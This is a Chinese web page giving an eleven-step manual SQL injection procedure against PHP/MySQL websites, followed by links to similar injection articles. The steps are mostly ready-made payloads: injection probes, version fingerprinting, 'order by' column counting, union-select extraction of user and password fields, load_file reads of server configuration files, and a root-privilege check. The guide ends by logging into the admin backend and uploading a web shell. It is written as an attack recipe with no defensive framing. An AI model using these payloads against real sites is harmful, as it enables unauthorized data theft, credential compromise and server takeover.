php注入基本步骤小结
所属分类:
网络安全 / 脚本攻防
阅读数:
207
收藏 0赞 0分享
php注入十点基本步骤
1、判断是否存在注入,加'、and 1=1、and 1=2
2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询
3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10
4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。
(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)
5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换
9、同理再猜解password字段,猜解成功再找后台登录。
10、登录后台,上传shell。
11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*
PHP+MySQL手工注入语句大全 MySQL手工注入语句总结
PHP + MySQL 手工注入语句大全,MySQL 手工注入语句总结,MySQL,注入语句。暴字段长度 匹配字段 暴字段位置 利用内置函数暴数据库信息 不用猜解可用字段暴数据库信息(有些网站不适用): 操作系统信息
收藏 0赞 0分享
PHP 双字节、宽字节编码漏洞
PHP 双字节、宽字节编码漏洞。看了《黑防09精华》这篇《双字节编码 php的隐形杀手》,记录一下。还是用一个demo.php显示效果
收藏 0赞 0分享
SQL注入测试实例分析
这篇文章主要为大家介绍了SQL注入测试实例分析,对于数据库安全非常重要,需要的朋友可以参考下
收藏 0赞 0分享
查看更多